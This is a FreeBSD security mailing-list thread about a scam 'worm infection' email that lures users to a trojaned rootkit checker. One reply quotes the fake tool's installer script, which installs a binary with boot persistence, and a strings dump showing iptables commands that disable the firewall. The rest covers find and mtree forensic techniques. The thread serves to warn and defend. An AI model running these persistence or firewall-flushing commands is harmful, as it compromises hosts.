Re: has my 10.1-RELEASE system been compromised
On Wed, Feb 25, 2015 at 04:04:59PM -0400, Joseph Mingrone wrote:
> Jung-uk Kim writes:
>
> > On 02/25/2015 14:41, Joseph Mingrone wrote:
> >> This morning when I arrived at work I had this email from my
> >> university's IT department (via email.it) informing me that my host
> >> was infected and spreading a worm.
> >>
> >> "Based on the logs fingerprints seems that your server is infected
> >> by the following worm: Net-Worm.PHP.Mongiko.a"
> >>
> >> my ip here - - [23/Feb/2015:14:53:37 +0100] "POST
> >> /?cmd=info&key=f8184c819717b6815a8b8037e91c59ef&ip=212.97.34.7
> >> HTTP/1.1" 200 429 "-" "Net-Worm.PHP.Mongiko.a"
> >>
> >> Despite the surprising name, I don't see any evidence that it's
> >> related to php. I did remove php, because I don't really need it.
> >> I've included my /etc/rc.conf below. pkg audit doesn't show any
> >> vulnerabilities. Searching for Worm.PHP.Mongiko doesn't show
> >> much. I've run chkrootkit, netstat/sockstat and I don't see
> >> anything suspicious and I plan to finally put some reasonable
> >> firewall rules on this host.
> >>
> >> Do you have any suggestions? Should I include any other
> >> information here?
> > ...
> >
> > I found this:
> >
> > http://security.stackexchange.com/questions/82273/what-is-net-worm-php-mongiko-trying-to-do
> >
> > Jung-uk Kim
>
> Yeah, I saw that as well. I wouldn't be concerned if this was hitting
> my web server, but the key difference here is that my IP is
> apparently the source in this case.

Did you see the part of the link that said the alert was likely a scam?
Sounds to me like the people who cold call people and tell them their
Windows computer is broken have moved on.

The fact your Uni's IT department sent an e-mail from email.it smells
extremely suspicious to me. Why would they use a 3rd party e-mail
solution instead of their own email system? Call your Uni's IT
department and confirm the report came from them.
Gary
___
freebsd-security@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-security
To unsubscribe, send any mail to "freebsd-security-unsubscr...@freebsd.org"
Re: FreeBSD Security Advisory FreeBSD-SA-15:04.igmp (fwd) - ipfw fix?
--On 25 February 2015 18:21 +0100 Remko Lodder wrote:

> This suggests that you can filter the traffic:
>
>   Block incoming IGMP packets by protecting your host/networks with a
>   firewall.
>
> (Quote from the SA).

It does, but it doesn't specifically say whether ipfw on *the host that's
being protected* is sufficient. I'd imagine in some scenarios that won't
work (because the host simply receiving a malformed packet would cause
issues) - so I was just getting it clarified that an ipfw rule on the
vulnerable *host itself* blocking igmp (any to any) is sufficient in this
case. i.e. you don't need an 'external' firewall sat in front of the hosts
to do that job.

-Karl
Re: has my 10.1-RELEASE system been compromised
On 26.02.2015 at 09:24, Gary Palmer wrote:
> On Wed, Feb 25, 2015 at 04:04:59PM -0400, Joseph Mingrone wrote:
>> Jung-uk Kim writes:
>>
>>> On 02/25/2015 14:41, Joseph Mingrone wrote:
>>>> This morning when I arrived at work I had this email from my
>>>> university's IT department (via email.it) informing me that my host
>>>> was infected and spreading a worm.
>>>>
>>>> "Based on the logs fingerprints seems that your server is infected
>>>> by the following worm: Net-Worm.PHP.Mongiko.a"
>>>>
>>>> my ip here - - [23/Feb/2015:14:53:37 +0100] "POST
>>>> /?cmd=info&key=f8184c819717b6815a8b8037e91c59ef&ip=212.97.34.7
>>>> HTTP/1.1" 200 429 "-" "Net-Worm.PHP.Mongiko.a"
>>>>
>>>> Despite the surprising name, I don't see any evidence that it's
>>>> related to php. I did remove php, because I don't really need it.
>>>> I've included my /etc/rc.conf below. pkg audit doesn't show any
>>>> vulnerabilities. Searching for Worm.PHP.Mongiko doesn't show
>>>> much. I've run chkrootkit, netstat/sockstat and I don't see
>>>> anything suspicious and I plan to finally put some reasonable
>>>> firewall rules on this host.
>>>>
>>>> Do you have any suggestions? Should I include any other
>>>> information here?
>>> ...
>>>
>>> I found this:
>>>
>>> http://security.stackexchange.com/questions/82273/what-is-net-worm-php-mongiko-trying-to-do
>>>
>>> Jung-uk Kim
>>
>> Yeah, I saw that as well. I wouldn't be concerned if this was hitting
>> my web server, but the key difference here is that my IP is
>> apparently the source in this case.
>
> Did you see the part of the link that said the alert was likely a scam?
> Sounds to me like the people who cold call people and tell them their
> Windows computer is broken have moved on.

The thing about the scam was posted by a friend after Joseph's post to
the freebsd-security mailing list, so people on stackexchange will be
warned as well.

Philip
Re: has my 10.1-RELEASE system been compromised
On Wed, 25 Feb 2015 20:55:43 +, Christopher Schulte wrote:
>> On Feb 25, 2015, at 2:34 PM, Philip Jocks wrote:
>>
>> it felt pretty scammy to me, googling for the "worm" got me to
>> rkcheck.org which was registered a few days ago and looks like a
>> tampered version of chkrootkit. I hope nobody installed it anywhere;
>> it seems to execute rkcheck/tests/.unit/test.sh which contains
>>
>> #!/bin/bash
>>
>> cp tests/.unit/test /usr/bin/rrsyncn
>> chmod +x /usr/bin/rrsyncn
>> rm -fr /etc/rc2.d/S98rsyncn
>> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
>> /usr/bin/rrsyncn
>> exit
>>
>> That doesn't look like something you'd want on your box...
>
> I filed a report with Google about that domain (Google Safe
> Browsing), briefly describing what's been recounted here on this
> thread. It seems quite suspicious, agreed.
>
> Has anyone started an analysis of the rrsyncn binary? The last few
> lines of a simple string dump are interesting... take note what looks
> to be an IP address of 95.215.44.195.
>
> /bin/sh
> iptables -X 2> /dev/null
> iptables -F 2> /dev/null
> iptables -t nat -F 2> /dev/null
> iptables -t nat -X 2> /dev/null
> iptables -t mangle -F 2> /dev/null
> iptables -t mangle -X 2> /dev/null
> iptables -P INPUT ACCEPT 2> /dev/null
> iptables -P FORWARD ACCEPT 2> /dev/null
> iptables -P OUTPUT ACCEPT 2> /dev/null
> udevd
> 95.215.44.195
> ;*3$"
>
>> Cheers,
>>
>> Philip
>
> Chris

Seeing as no one's mentioned it yet .. if your (linux) box were running
iptables - a reasonable assumption - then running those commands would
remove and flush all your rules, leaving you with a firewall that
accepted everything, as good as no firewall at all. And then .. ?

At least FreeBSD isn't the lowest hanging fruit for these monkeys ..

cheers, Ian
Re: has my 10.1-RELEASE system been compromised
On Wed, Feb 25, 2015, at 14:19, Walter Hop wrote:
>
> Example:
> # touch -t 20150101 foo
> # find / -user www -newer foo
>
> If you don’t find anything, look back a little further.
> Hopefully you will find a clue in this way.
>

Thanks for posting this trick -- I've never considered it before and
will certainly put it in my toolbox!
Re: has my 10.1-RELEASE system been compromised
On Thu, 26 Feb 2015 at 12:02:52 -0600, Mark Felder wrote:
> On Wed, Feb 25, 2015, at 14:19, Walter Hop wrote:
> >
> > Example:
> > # touch -t 20150101 foo
> > # find / -user www -newer foo
>
> Thanks for posting this trick -- I've never considered it before and
> will certainly put it in my toolbox!

While Walter is correct to give the universal form, if you know your system
supports the -newerXY option you can skip the temporary file and use:

# find / -user www -newermt 2015-01-01

Find is a fun program to get to grips with to spot odd things going on.
There's a tendency to assume you need to know what you're looking for in
the first place, but you can also tell it to show you things you don't
know about:

Files with an unknown user or group (tidying up after restoring partially
from a backup, or spotting hacks that weren't quite elegant enough):

# find / -nouser -o -nogroup

I know my $PATH will have executables in it, and some other directories are
almost certain to contain executables as well. But where are there
executables that aren't in the usual places (maybe hacks, maybe users riding
roughshod across the system installing things in strange places to trip
people up later when they don't get patched)?

# find -E / -type d -regex "`echo $PATH | sed -e \"s/:/\|/g\"`|/usr/libexec|/boot|/usr/src|/usr/local/etc/rc.d|/usr/local/lib|/usr/local/libexec|/usr/ports/.*/work|/usr/obj|/rescue|/etc/rc.d|/etc/periodic|/libexec" -prune -o -type f -perm +111 -print

And you can combine them, of course: modified since 1st Jan 2015, a regular
file and executable:

# find / -newermt 2015-01-01 -type f -perm +111

Glyn.
(Something of a fan of find :-)
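As an added example (my code, not Glyn's or anyone else's in the thread), here is the "executables outside the usual places, modified since a date" search wrapped in a reusable shell function, together with a constructed sample tree so it can be tried without touching a live host. The names hunt_execs and demo_tree are mine; the trusted-directory list is passed as a colon-separated string in the style of $PATH.

```shell
#!/bin/sh
# Added example, not code from the thread: Glyn's "executables outside the
# usual places, modified since a date" search as a reusable function, plus a
# constructed sample tree to exercise it. Uses -newermt (BSD and GNU find) and
# the POSIX spelling -perm -u+x in place of BSD-only -perm +111.

# hunt_execs ROOT SINCE TRUSTED
#   ROOT    tree to search ("/" on a live host)
#   SINCE   YYYY-MM-DD; only files modified after this date are listed
#   TRUSTED colon-separated directories (relative to ROOT) to prune,
#           e.g. "$PATH:/usr/libexec:/boot:/rescue:/usr/local/lib"
hunt_execs() {
    root=${1%/}; since=$2; trusted=$3
    # Build "-path ROOT/A -o -path ROOT/B ..." from the colon list.
    set --
    oldifs=$IFS; IFS=:
    for d in $trusted; do
        [ -z "$d" ] && continue
        [ $# -gt 0 ] && set -- "$@" -o
        set -- "$@" -path "$root$d"
    done
    IFS=$oldifs
    [ $# -eq 0 ] && set -- -false          # empty list: prune nothing
    # Skip trusted directories entirely, then keep fresh executable regular files.
    find "${root:-/}" -type d \( "$@" \) -prune -o \
        -type f -perm -u+x -newermt "$since" -print
}

# demo_tree: constructed sample tree. Two executables in trusted places, a
# non-executable web file, a stale 2014 executable, and one fresh executable
# dropped under the web root (a stand-in for the thread's rrsyncn). Prints
# the tree's path.
demo_tree() {
    t=$(mktemp -d)
    mkdir -p "$t/usr/bin" "$t/usr/local/lib" "$t/var/www/uploads" "$t/tmp/.x"
    for f in usr/bin/ls usr/local/lib/helper var/www/uploads/rrsyncn tmp/.x/update; do
        printf '#!/bin/sh\n' > "$t/$f"; chmod 755 "$t/$f"
    done
    printf 'hello\n' > "$t/var/www/uploads/index.html"
    touch -t 201401010000 "$t/tmp/.x/update"      # predates the 2015 cutoff
    printf '%s\n' "$t"
}

# Sample run (prints only .../var/www/uploads/rrsyncn):
#   tree=$(demo_tree); hunt_execs "$tree" 2015-01-01 /usr/bin:/usr/local/lib
```

On a real host the prune list should be as generous as Glyn's regex; anything left over is not automatically malicious, only unexplained.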
Re: has my 10.1-RELEASE system been compromised
On Thu, Feb 26, 2015, at 14:12, Glyn Grinstead wrote:
> On Thu, 26 Feb 2015 at 12:02:52 -0600, Mark Felder wrote:
> > On Wed, Feb 25, 2015, at 14:19, Walter Hop wrote:
> > >
> > > Example:
> > > # touch -t 20150101 foo
> > > # find / -user www -newer foo
> >
> > Thanks for posting this trick -- I've never considered it before and
> > will certainly put it in my toolbox!
>
> While Walter is correct to give the universal form, if you know your system
> supports the -newerXY option you can skip the temporary file and use:
>
> # find / -user www -newermt 2015-01-01
>
> Find is a fun program to get to grips with to spot odd things going on.
> There's a tendency to assume you need to know what you're looking for in
> the first place, but you can also tell it to show you things you don't
> know about:
>
> Files with an unknown user or group (tidying up after restoring partially
> from a backup, or spotting hacks that weren't quite elegant enough):
>
> # find / -nouser -o -nogroup
>
> I know my $PATH will have executables in it, and some other directories are
> almost certain to contain executables as well. But where are there
> executables that aren't in the usual places (maybe hacks, maybe users riding
> roughshod across the system installing things in strange places to trip
> people up later when they don't get patched)?
>
> # find -E / -type d -regex "`echo $PATH | sed -e \"s/:/\|/g\"`|/usr/libexec|/boot|/usr/src|/usr/local/etc/rc.d|/usr/local/lib|/usr/local/libexec|/usr/ports/.*/work|/usr/obj|/rescue|/etc/rc.d|/etc/periodic|/libexec" -prune -o -type f -perm +111 -print
>
> And you can combine them, of course: modified since 1st Jan 2015, a regular
> file and executable:
>
> # find / -newermt 2015-01-01 -type f -perm +111
>
> Glyn.
> (Something of a fan of find :-)

Please partner with MW Lucas and write a "find mastery" to document all of
these clever uses of find. (I'd read it.)
Re: has my 10.1-RELEASE system been compromised
I'd also suggest you take a look at using mtree for tripwire-like
functionality into the future - its primary purpose is to be able to
take the specification for a directory tree and either report
differences or make the filesystem conform to the specification.

Not sure whether it is used in the base FreeBSD system, but it's
definitely part of NetBSD, where it is used to confirm the permissions
and other metadata information for files from each of the release
tarballs and (iirc) runs once a week as part of normal system cron.

mtree can also be turned on a directory tree to capture a specification
that matches it ... it is better than find in this instance for
comparing the state of a filesystem over time, as it can be set to
calculate file digests by a variety of algorithms and produce output
that can be parsed and compared against later (which can be difficult
with the -ls output from find).

I also found a copy of it to run on Solaris to confirm that changes we
were making to our source only had the desired impacts to large
application data sets as part of our upgrade process.

Plus, until I mentioned it here, it might have been obscure enough for
it not to be trojanned by a rootkit ... :)

Hope that helps,
Malcolm

--
Malcolm Herbert
m...@mjch.net
Re: has my 10.1-RELEASE system been compromised
On Thu, Feb 26, 2015, at 14:52, Malcolm Herbert wrote:
> I'd also suggest you take a look at using mtree for tripwire-like
> functionality into the future - its primary purpose is to be able to
> take the specification for a directory tree and either report
> differences or make the filesystem conform to the specification.
>
> Not sure whether it is used in the base FreeBSD system, but it's
> definitely part of NetBSD, where it is used to confirm the permissions
> and other metadata information for files from each of the release
> tarballs and (iirc) runs once a week as part of normal system cron.
>
> mtree can also be turned on a directory tree to capture a specification
> that matches it ... it is better than find in this instance for
> comparing the state of a filesystem over time, as it can be set to
> calculate file digests by a variety of algorithms and produce output
> that can be parsed and compared against later (which can be difficult
> with the -ls output from find).
>
> I also found a copy of it to run on Solaris to confirm that changes we
> were making to our source only had the desired impacts to large
> application data sets as part of our upgrade process.
>
> Plus, until I mentioned it here, it might have been obscure enough for
> it not to be trojanned by a rootkit ... :)

mtree is a really handy tool. I especially love it for large changes like
changing the UIDs and GIDs for a lot of accounts. If you take an mtree
dump, change the UIDs and GIDs, and re-apply the mtree dump it will
quickly fix the permissions across your server because it stores the
user and group names, not the IDs.

I wish mtree was readily available on Linux.
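To give Malcolm's capture-then-compare workflow a form that also runs on the Linux hosts Mark mentions, here is an added example (my code, not from the thread or from the mtree project) that imitates the core of mtree with find, ls and sha256sum. The function names spec_capture and spec_compare are mine; like mtree it records owner names rather than numeric IDs, which is the property Mark relies on.

```shell
#!/bin/sh
# Added example (not from the thread or any project): a minimal mtree-style
# baseline built from find, ls and sha256sum, for hosts where mtree(8) is not
# available. It records owner *names*, not UIDs, plus a content digest per
# regular file, then reports added/removed/changed files. Directories,
# symlinks and timestamps are not covered; mtree itself does far more.

# digest FILE: print the SHA-256 of FILE (GNU sha256sum or BSD sha256).
digest() {
    if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1" | cut -d' ' -f1
    else sha256 -q "$1"; fi
}

# spec_capture DIR: one sorted line per regular file under DIR:
#   ./relative/path <mode string> <owner name> <sha256>
spec_capture() {
    dir=$1
    ( cd "$dir" && find . -type f | LC_ALL=C sort | while IFS= read -r f; do
        set -- $(ls -ld "$f")        # $1 = mode string, $3 = owner (GNU and BSD ls)
        printf '%s %s %s %s\n' "$f" "$1" "$3" "$(digest "$f")"
      done )
}

# spec_compare DIR SPEC: re-capture DIR and print "added|changed|removed <path>"
# for every difference against the saved SPEC; prints nothing if unchanged.
# A changed mode, owner or content all show up as "changed".
spec_compare() {
    spec_capture "$1" | awk '
        FILENAME == ARGV[1] { old[$1] = $0; next }   # pass 1: saved baseline
        { seen[$1] = 1
          if (!($1 in old))        print "added", $1
          else if (old[$1] != $0)  print "changed", $1 }
        END { for (p in old) if (!(p in seen)) print "removed", p }
    ' "$2" -
}

# Workflow, as Malcolm describes for mtree: capture once, keep the spec
# off-host (a compromised host can rewrite a local baseline), compare later.
#   spec_capture /usr/local/etc > /secure/host.spec
#   spec_compare /usr/local/etc /secure/host.spec
```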